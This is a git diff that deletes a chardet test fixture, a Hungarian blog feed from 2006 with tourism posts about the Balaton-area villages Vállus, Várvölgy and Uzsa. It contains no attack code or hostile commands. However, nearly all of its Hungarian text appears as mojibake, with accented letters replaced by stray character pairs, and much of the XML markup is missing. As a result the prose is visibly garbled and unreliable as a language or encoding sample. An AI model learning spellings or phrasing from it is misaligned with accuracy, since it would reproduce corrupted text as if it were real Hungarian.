    - diff --git a/chardet/tests/utf-8/balatonblog.typepad.com.xml b/chardet/tests/utf-8/balatonblog.typepad.com.xml deleted file mode 100644 index 2d6a438..0000000 --- a/chardet/tests/utf-8/balatonblog.typepad.com.xml +++ /dev/null @@ -1,387 +0,0 @@ - - - - - -BalatonOnLine -http://balatonblog.typepad.com/balatonblog/ -avagy a BalatonBLOG mֳ¡skֳ©pp: bֵ‘vebben, kategֳ³rizֳ¡lva, tematikus alblogokkal. -RSS = "Subscribe to this blog's feed", + kֳ©ptֳ¡rak... -hu - -2006-01-04T11:38:54+01:00 - - - - - - - - - - - - - - - -Vֳ¡llus a megbֳ÷vֳ³ -http://balatonblog.typepad.com/balatonblog/2006/01/vllus_a_megbv.html - Vֳ¡llus a Keszthelyi-hegysֳ©gben fekvֵ‘ kis telepֳ¼lֳ©s Zala megye Veszprֳ©m megyֳ©vel hatֳ¡ros szֳ©lֳ©n talֳ¡lhatֳ³. A kֳ¶zsֳ©get ma 158-an lakjֳ¡k. A hegyek kֳ¶zt meghֳ÷zֳ³dֳ³ telepֳ¼lֳ©s rֳ³mai katolikus templomֳ¡t 1836-ban ֳ©pֳ­tettֳ©k, kֳ©sֵ‘barokk ֳ©s klasszicizֳ¡lֳ³ stֳ­luselemekkel. [terkepcentrum.hu] Ennyi ֳ©s nem tֳ¶bb, amit elsֵ‘ nekifutֳ¡sra megtudhatunk a telepֳ¼lֳ©s jelenֳ©rֵ‘l. Mֳ÷ltja azonban fordulatokban gazdag derֳ¼l ki honlapjֳ¡n, ahol az ֳ¶nkormֳ¡nyzat alpinformֳ¡ciֳ³it is megtalֳ¡lhatjuk. A wikipedia is bֵ‘ven hoz adatokat mֳ÷ltjֳ¡ra vonatkozֳ³lag. Azt azonban, hogy miֳ©rt ֳ©rdemes ide lֳ¡togatni csak sejteni lehet. Vֳ¡lluson vezet ֳ¡t az orszֳ¡gos kֳ©k tֳ÷ra ֳ÷tvonala, bֳ©lyegzֵ‘hely a volt vegyesbolt falֳ¡n dobozban. [termeszetjaro.hu] Kֳ©t tֳ÷ra ajֳ¡nlatot is talֳ¡ltam: Gyenesdiֳ¡s - Vֳ¡llus (9,0 km) Vֳ¡llus - Lesenceistvֳ¡nd (6,8 km) A kֳ¶rnyֳ©ken elrejtett geolֳ¡da leֳ­rֳ¡sa szerint: A Szent Miklֳ³s forrֳ¡stֳ³l indul ֳ©szakra a Vֳ¡llus faluig tartֳ³ Szent Miklֳ³s szurdokvֳ¶lgy. A forrֳ¡s kֳ¶rnyֳ©kֳ©n rֳ©gen kolostor ֳ¡llt, melynek mֳ¡ra mֳ¡r romjait sem talֳ¡lni. ֳ‰rdemes felkeresni a hegysֳ©g eme nyugodt zugֳ¡t. [geocaching.hu] Ugyanitt derֳ¼l ki, hogy ezen az a szakaszon kell keresnֳ¼nk a hֵ‘s kutyֳ¡k temetֵ‘jֳ©t. (Az ilyesmi mֳ©giscsak ritkasֳ¡gszֳ¡mba megy, kֳ¶rnyezete pedig minden ֳ©vszakban gyֳ¶nyֳ¶rֵ±.) A zsֳ¡kfalu hֳ©tkֳ¶znapjairֳ³l annyit tudni, hogy rֳ©gi ֳ¡lmuk egy a Balatonparttal (Gyenesdiֳ¡ssal) ֵ‘ket ֳ¶sszekֳ¶tֵ‘ kerֳ©kpֳ¡rֳ÷t. 2003-ban pֳ¡lyֳ¡zatuk el lett utasֳ­tva Vֳ¡llus Kֳ¶zsֳ©g ֳ–nkormֳ¡nyzata - Balatongyֳ¶rֳ¶k-Vֳ¡llus ֳ÷tvonalon kerֳ©kpֳ¡rֳ÷t tervezֳ©se - forrֳ¡shiֳ¡ny miatt... -Kep_15 - -
    -"Vֳ¡llus a Keszthelyi-hegysֳ©gben fekvֵ‘ kis telepֳ¼lֳ©s Zala megye Veszprֳ©m -megyֳ©vel hatֳ¡ros szֳ©lֳ©n talֳ¡lhatֳ³. A kֳ¶zsֳ©get ma 158-an lakjֳ¡k. A -hegyek kֳ¶zt meghֳ÷zֳ³dֳ³ telepֳ¼lֳ©s rֳ³mai katolikus templomֳ¡t 1836-ban -ֳ©pֳ­tettֳ©k, kֳ©sֵ‘barokk ֳ©s klasszicizֳ¡lֳ³ stֳ­luselemekkel." [terkepcentrum.hu]

    - -

    Vallus - -
    -Ennyi ֳ©s nem tֳ¶bb, amit elsֵ‘ nekifutֳ¡sra megtudhatunk a telepֳ¼lֳ©s jelenֳ©rֵ‘l. Mֳ÷ltja azonban fordulatokban gazdag derֳ¼l ki honlapjֳ¡n, ahol az ֳ¶nkormֳ¡nyzat alpinformֳ¡ciֳ³it is megtalֳ¡lhatjuk. A wikipedia is bֵ‘ven hoz adatokat mֳ÷ltjֳ¡ra vonatkozֳ³lag.

    - -

    -Azt azonban, hogy miֳ©rt ֳ©rdemes ide lֳ¡togatni csak sejteni lehet.

    - -

    060104mjvirg - -
    -Vֳ¡lluson vezet ֳ¡t az orszֳ¡gos kֳ©k tֳ÷ra ֳ÷tvonala, bֳ©lyegzֵ‘hely "a volt vegyesbolt falֳ¡n dobozban". [termeszetjaro.hu]

    - -

    -Kֳ©t tֳ÷ra ajֳ¡nlatot is talֳ¡ltam:

    -

    Gyenesdiֳ¡s - Vֳ¡llus (9,0 km)

    -

    Vֳ¡llus - Lesenceistvֳ¡nd (6,8 km)

    - -

    060104 - -
    -A kֳ¶rnyֳ©ken elrejtett geolֳ¡da leֳ­rֳ¡sa szerint:
    -"A Szent Miklֳ³s forrֳ¡stֳ³l indul ֳ©szakra a Vֳ¡llus faluig tartֳ³ Szent Miklֳ³s szurdokvֳ¶lgy. A forrֳ¡s kֳ¶rnyֳ©kֳ©n rֳ©gen kolostor ֳ¡llt, melynek mֳ¡ra mֳ¡r romjait sem talֳ¡lni. ֳ‰rdemes felkeresni a hegysֳ©g eme nyugodt zugֳ¡t." [geocaching.hu]

    - -

    060104kutyatemet - -
    -Ugyanitt derֳ¼l ki, hogy ezen az a szakaszon kell keresnֳ¼nk a hֵ‘s kutyֳ¡k temetֵ‘jֳ©t. (Az ilyesmi mֳ©giscsak ritkasֳ¡gszֳ¡mba megy, kֳ¶rnyezete pedig minden ֳ©vszakban gyֳ¶nyֳ¶rֵ±.)

    - -

    -A zsֳ¡kfalu hֳ©tkֳ¶znapjairֳ³l annyit tudni, hogy rֳ©gi ֳ¡lmuk egy a -Balatonparttal (Gyenesdiֳ¡ssal) ֵ‘ket ֳ¶sszekֳ¶tֵ‘ kerֳ©kpֳ¡rֳ÷t. -2003-ban pֳ¡lyֳ¡zatuk el lett utasֳ­tva
    -"Vֳ¡llus Kֳ¶zsֳ©g ֳ–nkormֳ¡nyzata - Balatongyֳ¶rֳ¶k-Vֳ¡llus ֳ÷tvonalon -kerֳ©kpֳ¡rֳ÷t tervezֳ©se - forrֳ¡shiֳ¡ny miatt tֳ¡mogatֳ¡sban nem -rֳ©szesֳ¼lt"--http://www.balatonregion.hu/balaton.phtml?cat=0&doc=palya/eredmenyek/2003/gyujtout_2003.html

    - -

    060104vlltur - -
    -Egy ֳ©vre rֳ¡ a Zalamֳ©diֳ¡ban ezt olvashattuk:
    -"Vֳ¡llus kֳ¶zsֳ©g ֳ¶nkormֳ¡nyzatֳ¡val ֳ¶sszefogva pedig beadtunk egy -Regionֳ¡lis Operatֳ­v Program megvalֳ³sֳ­tֳ¡sֳ¡t cֳ©lul kitֵ±zֵ‘ pֳ¡lyֳ¡zatot egy -erdei kerֳ©kpֳ¡rֳ÷t 400 milliֳ³t meghaladֳ³ megvalֳ³sֳ­tֳ¡sֳ¡ra. Vֳ¡llus, mint -zsֳ¡ktelepֳ¼lֳ©s nyitottֳ¡ vֳ¡lik a turistֳ¡k elֵ‘tt, kerekes kirֳ¡ndulֳ¡sok -cֳ©lpontja lehet, bekapcsolֳ³dhat a turizmus ֳ¡ramkֳ¶rֳ©be ֳ÷gy, hogy kֳ¶zben -az erdֵ‘k-mezֵ‘k szֳ©psֳ©geit is megmutathatja. A mindֳ¶ssze 2,5 szֳ¡zalֳ©kos -ֳ¶nerֵ‘t megkֳ¶vetelֵ‘ projektben partnersֳ©get vֳ¡llalt a -Nemzeti Park -is."--http://64.233.183.104/search?q=cache:5NZGcxQpe-IJ:www.zalamedia.hu/naplo/041124/t.html+v%C3%A1llus&hl=hu&client=firefox-a

    - -

    -Hogy mi lett az ֳ¡lmokbֳ³l? Van e szֳ¡llֳ¡slehetֵ‘sֳ©g? Mֳ¡jusban megmondom. Addig mֳ©g nֳ©hֳ¡ny informֳ¡ciֳ³:

    -

    Tֳ‰RKֳ‰P

    -

    Az ֳ¶nkormֳ¡nyzat adatai

    ]]>
    - - -"Balatonikum" -Ajֳ¡nlֳ³ -Balaton -Balatoni Gyalog -Balatoni Lֳ¡tnivalֳ³ -Balatoni Szֳ¡llֳ¡s -Balatoni Tֳ©rkֳ©p -Bicikli Balatoni -Falusi turizmus -Keszthelyi-hegysֳ©g -Pֳ¡lyֳ¡zatok -Tudֳ¡stֳ¡r -Turizmus -Tֳ¡jak, telepֳ¼lֳ©sek -Zֳ¶ld: zֳ¶ldebb -ֳ–nkormֳ¡nyzֳ³ - -ivcsek -2006-01-04T11:38:54+01:00 -
    - -Vֳ¡rvֳ¶lgy -http://balatonblog.typepad.com/balatonblog/2006/01/vrvlgy.html -Mֳ¡r a telepֳ¼lֳ©s neve is termֳ©szeti kֳ¶rnyezetֳ©re utal, hiszen a kֳ¶zsֳ©g alatt elterֳ¼lֵ‘ szֳ©les vֳ¶lgy nyugalmֳ¡t egykor kֳ©t oldalrֳ³l is egy-egy erֵ‘ssֳ©g ֵ‘rizte, Rezi ֳ©s Tֳ¡tika vֳ¡ra. A Keszthelytֵ‘l ֳ©szaki irֳ¡nyban, mintegy 15 kilomֳ©terre fekvֵ‘ Vֳ¡rvֳ¶lgy ideֳ¡lis kֳ¶rnyezetben vֳ¡rja a falusi turizmus kedvelֵ‘it. Ehhez minden adottsֳ¡ga megvan, a szֳ¡llֳ¡shelyek kֳ­nֳ¡lata, a szubmediterrֳ¡n ֳ©ghajlat ֳ©s jֳ³ kirֳ¡ndulֳ¡si lehetֵ‘sֳ©gek a szֳ©lrֳ³zsa minden irֳ¡nyֳ¡ban. A tֳ÷rֳ¡zֳ³k innen kֳ¶nynyen elֳ©rhetik Sֳ¼meget, a kֳ¶zeli Zalaszֳ¡ntֳ³t ֳ©s a mֳ¡r emlֳ­tett vֳ¡rakat. [hajo.sailing.hu] A Vֳ¡rvֳ¶lgytֵ‘l ֳ©szakkeletre lֳ©vֵ‘ Kis-Lֳ¡zhegyrֵ‘l mֳ¡r 1934-ben feltֳ©telezte Dornyay B., hogy ֵ‘skori fֳ¶ldvֳ¡r... A bֳ¡nya falֳ¡ban megfigyelt gֳ¶drֳ¶k anyaga alapjֳ¡n a terֳ¼let a kֳ©sֵ‘bronzkorban, az urnamezֵ‘s kultֳ÷ra idejֳ©n volt lakott. Kiterjedֳ©se alapjֳ¡n a lelֵ‘hely a Dunֳ¡ntֳ÷l legnagyobb kֳ©sֵ‘bronzkori magaslati telepe. A terֳ¼let vֳ©delmֳ©t a hegyet ֳ¶vezֵ‘ meredek bazalt fal biztosֳ­totta, a platֳ³ belsejֳ©ben talֳ¡lhatֳ³ tavak pedig az ֳ©lethez nֳ©lkֳ¼lֳ¶zhetetlen vizet szolgֳ¡ltattֳ¡k. Az erֵ‘dֳ­tett telep fֵ‘bejֳ¡rata a dֳ©lii oldalon lehetett, ... a bejֳ¡rati kaput kֳ©t mֳ¡ig 4-5 m-t a kֳ¶rnyezete fֳ¶lֳ© magasodֳ³, rֳ¶vid mestersֳ©gesen emelt sֳ¡nc, - a helybeliek ֳ–rdֳ¶kkֳ¶veknek nevezik ג€“ vֳ©dte. A lelֵ‘hely fontossֳ¡gֳ¡t jelzi, hogy kֳ¶zvetlen kֳ¶rzetֳ©ben 1879 ֳ³ta hֳ¡rom bronz- ֳ©s egy arany kincslelet kerֳ¼lt elֵ‘. [zmmi.hu] Vֳ¡rvֳ¶lgy a Keszthelyi-hegysֳ©g kֳ¶zepֳ©n talֳ¡lhatֳ³, festֵ‘i szֳ©psֳ©gֵ± kiskֳ¶zsֳ©g. Rֳ©gi neve Zsid, amely a latin... -"Mֳ¡r a telepֳ¼lֳ©s neve is termֳ©szeti kֳ¶rnyezetֳ©re utal, hiszen a kֳ¶zsֳ©g alatt elterֳ¼lֵ‘ szֳ©les vֳ¶lgy nyugalmֳ¡t egykor kֳ©t oldalrֳ³l is egy-egy erֵ‘ssֳ©g ֵ‘rizte, Rezi ֳ©s Tֳ¡tika vֳ¡ra. A Keszthelytֵ‘l ֳ©szaki irֳ¡nyban, mintegy 15 kilomֳ©terre fekvֵ‘ Vֳ¡rvֳ¶lgy ideֳ¡lis kֳ¶rnyezetben vֳ¡rja a falusi turizmus kedvelֵ‘it. Ehhez minden adottsֳ¡ga megvan, a szֳ¡llֳ¡shelyek kֳ­nֳ¡lata, a szubmediterrֳ¡n ֳ©ghajlat ֳ©s jֳ³ kirֳ¡ndulֳ¡si lehetֵ‘sֳ©gek a szֳ©lrֳ³zsa minden irֳ¡nyֳ¡ban. A tֳ÷rֳ¡zֳ³k innen kֳ¶nynyen elֳ©rhetik Sֳ¼meget, a kֳ¶zeli Zalaszֳ¡ntֳ³t ֳ©s a mֳ¡r emlֳ­tett vֳ¡rakat." [hajo.sailing.hu]

    - -

    Varvolgy5k - -
    "A Vֳ¡rvֳ¶lgytֵ‘l ֳ©szakkeletre lֳ©vֵ‘ Kis-Lֳ¡zhegyrֵ‘l mֳ¡r 1934-ben feltֳ©telezte Dornyay B., hogy ֵ‘skori fֳ¶ldvֳ¡r... A bֳ¡nya falֳ¡ban megfigyelt gֳ¶drֳ¶k anyaga alapjֳ¡n a terֳ¼let a kֳ©sֵ‘bronzkorban, az urnamezֵ‘s kultֳ÷ra idejֳ©n volt lakott. Kiterjedֳ©se alapjֳ¡n a lelֵ‘hely a Dunֳ¡ntֳ÷l legnagyobb kֳ©sֵ‘bronzkori magaslati telepe. A terֳ¼let vֳ©delmֳ©t a hegyet ֳ¶vezֵ‘ meredek bazalt fal biztosֳ­totta, a platֳ³ belsejֳ©ben talֳ¡lhatֳ³ tavak pedig az ֳ©lethez nֳ©lkֳ¼lֳ¶zhetetlen vizet szolgֳ¡ltattֳ¡k. Az erֵ‘dֳ­tett telep fֵ‘bejֳ¡rata a dֳ©lii oldalon lehetett, ... a bejֳ¡rati kaput kֳ©t mֳ¡ig 4-5 m-t a kֳ¶rnyezete fֳ¶lֳ© magasodֳ³, rֳ¶vid mestersֳ©gesen emelt sֳ¡nc, - a helybeliek ֳ–rdֳ¶kkֳ¶veknek nevezik ג€“ vֳ©dte. A lelֵ‘hely fontossֳ¡gֳ¡t jelzi, hogy kֳ¶zvetlen kֳ¶rzetֳ©ben 1879 ֳ³ta hֳ¡rom bronz- ֳ©s egy arany kincslelet kerֳ¼lt elֵ‘." [zmmi.hu]

    - -

    060102var - -
    "Vֳ¡rvֳ¶lgy a Keszthelyi-hegysֳ©g kֳ¶zepֳ©n talֳ¡lhatֳ³, festֵ‘i szֳ©psֳ©gֵ± kiskֳ¶zsֳ©g. Rֳ©gi neve Zsid, amely a latin Sidoniusbֳ³l szֳ¡rmazik. A kֳ¶zsֳ©g nevֳ©vel elֵ‘szֳ¶r az almֳ¡di monostor alapֳ­tֳ³levelֳ©ben talֳ¡lkozunk 1121-ben. Vֳ¡rֳ¡t 1244-ben IV. Bֳ©la kirֳ¡ly a johannitֳ¡knak adomֳ¡nyozta. A XV. szֳ¡zadban a Rezi vֳ¡r tartozֳ©ka, majd a vֳ¡rral egyֳ¼tt kirֳ¡lyi adomֳ¡nykֳ©nt Gersei Pethֵ‘ Lֳ¡szlֳ³ tulajdonֳ¡ba kerֳ¼l. 1740-tֵ‘l 200 ֳ©ven ֳ¡t a Festetics-csalֳ¡dֳ©." [ujember.katolikus.hu]

    - -

    060102101_keszthelykapolna - -
    "A falu mֵ±emlֳ©k templomֳ¡t a XIV. szֳ¡zad elejֳ©n Kֳ¡roly Rֳ³bert uralkodֳ¡sa idejֳ©n ֳ©pֳ­tettֳ©k gֳ³tikus stֳ­lusban, a jelenlegi romantikus formֳ¡jֳ¡t 1899-ben kapta. Tornyֳ¡ban van az orszֳ¡g legrֳ©gibb harangja, melyet 1524-ben ֳ¶ntֳ¶ttek. A ma is megtekinthetֵ‘ barokk temetֵ‘kֳ¡polna a XVIII. szֳ¡zadbֳ³l szֳ¡rmazik." [iranymagyarorszag.hu]

    - -

    "Az 1960-as ֳ©vekben a falu lakossֳ¡ga nagyban csֳ¶kkent, de az ott maradֳ³k is mֳ¡shol kerestek munkֳ¡t. 1976-ban Vֳ¡llussal egyesֳ­tettֳ©k, majd 1990-tֵ‘l ֳ÷jbֳ³l ֳ¶nֳ¡llֳ³ telepֳ¼lֳ©s. Azֳ³ta komoly falusi turizmus ֳ©pֳ¼lt ki a kֳ¶zsֳ©gben." [hu.wikipedia.org]

    - -

    ֳ–nkormֳ¡nyzati informֳ¡ciֳ³k

    - -

    Polgֳ¡rmesteri Hivatal
    8316 Vֳ¡rvֳ¶lgy, Kossuth u. 67.
    Tel:83/371-401, 83/371-519
    Fax:83/371-401
    Email: varvolgy@axelero.hu

    - -

    Az ֳ¶nkormֳ¡nyzat adatai
    Az ֳ¶nkormֳ¡nyzat a Tֳ¡tika-Rezi Kistֳ©rsֳ©gi Tֳ¡rsulֳ¡s tagja.

    - -

    Szֳ¡llֳ¡s

    - -

    Szֳ¡llֳ¡sadֳ³k, sֳ¡torozֳ³hely

    - -

    Van 40 fֵ‘s ifjֳ÷sֳ¡gi szֳ¡llֳ¡sa az iskolֳ¡ban, ahol nyֳ¡ri tֳ¡boroztatֳ¡st is szerveznek.

    - -

    Hegyi Lovaspanziֳ³
    -
    Vida Vendֳ©ghֳ¡z

    - -

    Egyֳ©b informֳ¡ciֳ³:
    -Vֳ¡rvֳ¶lgy Hegykֳ¶zsֳ©g:
    -Kovֳ¡cs Pֳ©ter Vֳ¡rvֳ¶lgy Kossuth u. 110. 06-30-265-5085

    - -

    eMagyarorszֳ¡g pont

    - -

    Tֳ‰RKֳ‰P

    - -

    "Vizsgֳ¡lat alֳ¡ kell venni a mai Vֳ¡rvֳ¶lgy (korֳ¡bban Zsid) falu kֳ¶rnyֳ©kֳ©t is. A helysֳ©gnֳ©vben ugyanis szintֳ©n a "sֳ©d" (-syth, zsid) ֳ¶sszetֳ©telt sejtjֳ¼k. Vֳ¡llus ֳ©s Vֳ¡rvֳ¶lgy kֳ¶zsֳ©gek kֳ¶zֳ¶tt fֳ©lֳ÷ton, az erdֵ‘ben szintֳ©n van egy pֳ¡los kolostorhely (alapfalai felismerhetֵ‘k). Ennek adata csak 1429-tֵ‘l ismert, az elrendezֳ©s alapjֳ¡n viszont inkֳ¡bb XIII. szֳ¡zadi eredetֵ±nek tartjuk. Itt ellentmondֳ¡st csak az jelent, hogy a vֳ¡llusi kolostor titulusa Sz.Miklֳ³s volt." [arch.eptort.bme.hu]

    - -

    "Minap bֳ¶ngֳ©sztem a Balaton felvidֳ©k tֳ©rkֳ©pֳ©t ֳ©s nem messze a 84 fֵ‘ֳ÷ttֳ³l szemembe ֳ¶tlֳ¶tt egy kis felirat "szֳ©p kilֳ¡tֳ¡s" Nosza felkerestֳ¼k a megjelֳ¶lt helyet, ֳ©s a felirat /szerintֳ¼nk/ nem hazudott. A Kֵ‘-orra nevezetֵ± hegytetֵ‘rֵ‘l volna szֳ³, mely megkֳ¶zelֳ­thetֵ‘ Lesenceistvֳ¡ndrֳ³l, ֳ©s Lesencetomajrֳ³l is. Helyszֳ­ni szemle alapjֳ¡n azonban mֳ©gsem oda rejtettֳ¼nk, mert ahogy a turista atlasz is ֳ­rja: "a felnֳ¶vekvֵ‘ fֳ¡k miatt nem teljes a kilֳ¡tֳ¡s rֳ³la". Inkֳ¡bb a Kis pֳ÷p magassֳ¡gi pontja kֳ¶zelֳ©be raktuk a lֳ¡dֳ¡t, ahol majdnem 360 fokos kilֳ¡tֳ¡sban gyֳ¶nyֳ¶rkֳ¶dhetֳ¼nk. Tiszta idֵ‘ben lֳ¡tni a Tapolcai medencֳ©t, a tanֳ÷hegyeket, ֳ¡tlֳ¡tni a kֳ¡li medence egyes rֳ©szeire, lֳ¡tni az edericsi vonulat innensֵ‘ lapjֳ¡t, ֳ©s persze egy darabot a Balatonbֳ³l. Ha ֳ‰k-re , a Bakony felֳ© fordulunk, az Agֳ¡r tetֵ‘n tֳ÷l, mֳ©g a Somlֳ³ig is ellֳ¡tunk. Nyugat felֳ© mֳ¡r feltֵ±nik a Vֳ¡llus mֳ¶gֳ¶tti vonulat, a falu szֳ©lsֵ‘ hֳ¡za, a hosszֳ÷ hֳ¡t, melynek ֳ©szaki csֳ¼cskֳ©n a Rezi vֳ¡rֳ¡nak romjai ֳ¼lnek." [geocaching.hu]

    ]]>
    - - -Ajֳ¡nlֳ³ -Balaton -Balaton & internet -Balatoni Gyalog -Balatoni Lovas -Balatoni Lֳ¡tnivalֳ³ -Balatoni Szֳ¡llֳ¡s -Balatoni Tֳ©rkֳ©p -Balatoni bor -Falusi turizmus -Keszthelyi-hegysֳ©g -Tudֳ¡stֳ¡r -Turizmus -Tֳ¡jak, telepֳ¼lֳ©sek -VֳRVֳ–LGY -Zֳ¶ld: zֳ¶ldebb -ֳ–nkormֳ¡nyzֳ³ - -ivcsek -2006-01-03T08:41:05+01:00 -
    - -Uzsa: a rֳ©gi ֳ©s az ֳ÷j -http://balatonblog.typepad.com/balatonblog/2006/01/uzsa_a_rgi_s_az.html -Uzsa kֳ¶zsֳ©g a Tapolcai-medence ֳ©szaknyugati peremֳ©n talֳ¡lhatֳ³. Nevֳ©ben ֳ©s termֳ©szeti kֳ¶rnyezetֳ©ben a rֳ©gmֳ÷lthoz kֳ¶tֵ‘dik, mֳ­g jelenֳ©ben a jֳ¶vֵ‘jֳ¼ket keresֵ‘ falvak kֳ¶zֳ© tartozik. Mai formֳ¡jֳ¡t az 1950-es ֳ©vekben nyitott kֵ‘bֳ¡nyֳ¡nak kֳ¶szֳ¶nheti. Tipikus bֳ¡nֳ¡sztelepֳ¼lֳ©s, 1995. augusztus 20-ֳ¡n nyilvֳ¡nֳ­tottֳ¡k ֳ¶nֳ¡llֳ³ kֳ¶zsֳ©ggֳ©. A kֳ¶rnyezֵ‘ erdֵ‘k maradandֳ³ ֳ©lmֳ©nyt nyֳ÷jtanak a termֳ©szet kedvelֵ‘inek. A kֳ¶zsֳ©g melletti hegytetֵ‘rֵ‘l belֳ¡thatֳ³ az egֳ©sz Tapolcai-medence. [balatone.hu] A Balatontֳ³l ֳ©s Tapolcֳ¡tֳ³l 12 km-re fekszik... Neve egy ֵ‘si magyar szemֳ©lynֳ©vbֵ‘l, az Uzֳ¡bֳ³l szֳ¡rmazik. 1247-ben emlֳ­tik elsֵ‘ֳ­zben Usa nֳ©ven. Az Uzsa-vֳ¶lgyben, a Lesence-patak ֳ÷j medrֳ©ben kimosott bronzkincsek felszֳ­nre kerֳ¼lֳ©se ֵ‘skori telepֳ¼lֳ©s kultֳ÷rֳ¡jֳ¡nak lֳ©tֳ©t ֳ¼zenik. A bֵ‘ vֳ­zֵ± Szentlֳ©lek forrֳ¡s kֳ¶zelֳ©ben a kֳ¶zֳ©pkori pֳ¡los kolostor romjai lֳ¡tszanak. Az uzsai erdֵ‘rengeteg gazdag vadֳ¡llomֳ¡nnyal bֳ­r. A telepֳ¼lֳ©snek tֳ¶bb mint 400 lakֳ³ja van. A 84. szֳ¡mֳ÷ fֵ‘ֳ÷trֳ³l jֳ³l megkֳ¶zelֳ­thetֵ‘, a Sarvay forrֳ¡s vidֳ©ke kellemes kirֳ¡ndulֳ³hely. [iranymagyarorszag.hu] Elsֵ‘dleges vonzerejֳ©t az erdֳ©szet ֳ÷tjai mentֳ©n felfedezhetֵ‘ nֳ¶vֳ©ny ֳ©s ֳ¡llatvilֳ¡ga, a magaslatokrֳ³l feltֳ¡rulֳ³ balatoni panorֳ¡ma ֳ©s a vadֳ¡sz ֳ©s kirֳ¡ndulֳ³ turizmust kiszolgֳ¡lֳ³ lֳ©tesֳ­tmֳ©nyei jelentik. A Balatontֳ³l 15 km-re, a Bakonyban fekvֳµ 11.300 hektֳ¡r nagysֳ¡gֳ÷ uzsai vadֳ¡szterֳ¼letet csaknem 7.400 ha-on erdֳµ borֳ­tja. Erdeinek kivֳ¡lֳ³ vadeltartֳ³ kֳ©pessֳ©ge fֳµleg a nagyvadnak kedvez. ֳllandֳ³ vadfajunk a gֳ­m, a vaddisznֳ³, a muflon ֳ©s az ֳµz. Az ֳ©ves terֳ­tֳ©k meghaladja az 500 db-ot. Az Uzsai ֳ©geres-t ritka... -Uzsa kֳ¶zsֳ©g a Tapolcai-medence ֳ©szaknyugati peremֳ©n talֳ¡lhatֳ³. Nevֳ©ben ֳ©s termֳ©szeti kֳ¶rnyezetֳ©ben a rֳ©gmֳ÷lthoz kֳ¶tֵ‘dik, mֳ­g jelenֳ©ben a jֳ¶vֵ‘jֳ¼ket keresֵ‘ falvak kֳ¶zֳ© tartozik.
    "Mai formֳ¡jֳ¡t az 1950-es ֳ©vekben nyitott kֵ‘bֳ¡nyֳ¡nak kֳ¶szֳ¶nheti. Tipikus bֳ¡nֳ¡sztelepֳ¼lֳ©s, 1995. augusztus 20-ֳ¡n nyilvֳ¡nֳ­tottֳ¡k ֳ¶nֳ¡llֳ³ kֳ¶zsֳ©ggֳ©. A kֳ¶rnyezֵ‘ erdֵ‘k maradandֳ³ ֳ©lmֳ©nyt nyֳ÷jtanak a termֳ©szet kedvelֵ‘inek. A kֳ¶zsֳ©g melletti hegytetֵ‘rֵ‘l belֳ¡thatֳ³ az egֳ©sz Tapolcai-medence." [balatone.hu]

    - -

    306358j - -

    - -

    "A Balatontֳ³l ֳ©s Tapolcֳ¡tֳ³l 12 km-re fekszik... Neve egy ֵ‘si magyar szemֳ©lynֳ©vbֵ‘l, az Uzֳ¡bֳ³l szֳ¡rmazik. 1247-ben emlֳ­tik elsֵ‘ֳ­zben Usa nֳ©ven. Az Uzsa-vֳ¶lgyben, a Lesence-patak ֳ÷j medrֳ©ben kimosott bronzkincsek felszֳ­nre kerֳ¼lֳ©se ֵ‘skori telepֳ¼lֳ©s kultֳ÷rֳ¡jֳ¡nak lֳ©tֳ©t ֳ¼zenik. A bֵ‘ vֳ­zֵ± Szentlֳ©lek forrֳ¡s kֳ¶zelֳ©ben a kֳ¶zֳ©pkori pֳ¡los kolostor romjai lֳ¡tszanak. Az uzsai erdֵ‘rengeteg gazdag vadֳ¡llomֳ¡nnyal bֳ­r. A telepֳ¼lֳ©snek tֳ¶bb mint 400 lakֳ³ja van. A 84. szֳ¡mֳ÷ fֵ‘ֳ÷trֳ³l jֳ³l megkֳ¶zelֳ­thetֵ‘, a Sarvay forrֳ¡s vidֳ©ke kellemes kirֳ¡ndulֳ³hely." [iranymagyarorszag.hu]

    - -

    Elsֵ‘dleges vonzerejֳ©t az erdֳ©szet ֳ÷tjai mentֳ©n felfedezhetֵ‘ nֳ¶vֳ©ny ֳ©s ֳ¡llatvilֳ¡ga, a magaslatokrֳ³l feltֳ¡rulֳ³ balatoni panorֳ¡ma ֳ©s a vadֳ¡sz ֳ©s kirֳ¡ndulֳ³ turizmust kiszolgֳ¡lֳ³ lֳ©tesֳ­tmֳ©nyei jelentik.

    - -

    "A Balatontֳ³l 15 km-re, a Bakonyban fekvֳµ 11.300 hektֳ¡r nagysֳ¡gֳ÷ uzsai vadֳ¡szterֳ¼letet csaknem 7.400 ha-on erdֳµ borֳ­tja. Erdeinek kivֳ¡lֳ³ vadeltartֳ³ kֳ©pessֳ©ge fֳµleg a nagyvadnak kedvez. ֳllandֳ³ vadfajunk a gֳ­m, a vaddisznֳ³, a muflon ֳ©s az ֳµz. Az ֳ©ves terֳ­tֳ©k meghaladja az 500 db-ot."
    Uzsa1erdszhz - -

    - -

    Az "Uzsai ֳ©geres"-t ritka nֳ¶vֳ©nyei (pֳ¡frֳ¡nyok stb.) miatt vֳ©dettֳ© nyilvֳ¡nֳ­tottֳ¡k. A mellette lֳ©vֳµ csarabos (Calluna vulgaris nevֳ» ֳ¶rֳ¶kzֳ¶ld tֳ¶rpecserje-ֳ¡llomֳ¡ny) elterjedֳ©sֳ©nek ez a legkeletibb dunֳ¡ntֳ÷li pontja. Nagyon mutatֳ³s, amikor nyֳ¡rutֳ³n halovֳ¡ny lilֳ¡srֳ³zsaszֳ­n virֳ¡gainak tֳ¶mege nyֳ­lik. A keleti oldalֳ¡n levֳµ lֳ¡pfolt alhavasi ֳ©s egyֳ©b nֳ¶vֳ©nyritkasֳ¡gok tenyֳ©szhelye." [bp-erdo.hu]
    Uzsa04 - -

    - -

    Szֳ¡llֳ¡s ֳ©s vendֳ©glֳ¡tֳ¡s

    - -

    Szent Hubertus Panziֳ³ ֳ©s ֳ‰tterem
    ֳ‰tterem, Kֳ¼lֳ¶nterem, Tenisz, Lovaglֳ¡s, Tֳ©vֳ©, Kutya, macska bevihetֵ‘, Bֳ¼fֳ©, Tollaslabda, Parkolֳ³, Fֳ¼rdֵ‘szobֳ¡s szoba, Reggeli, Nyitott uszoda, Pihenֵ‘park, Ifjֳ÷sֳ¡gi szֳ¡llֳ¡s, Jֳ¡tszֳ³tֳ©r, Konferenciatechnika, Ifjֳ÷sֳ¡gi programok, Kirֳ¡ndulֳ¡s, Gyalogtֳ÷ra, Gyermektֳ¡bor

    - -

    ֳrbֳ©ri Vadֳ¡szhֳ¡z
    Nyitvatartֳ¡s szezonban

    - -

    Polgֳ¡rmesteri Hivatal
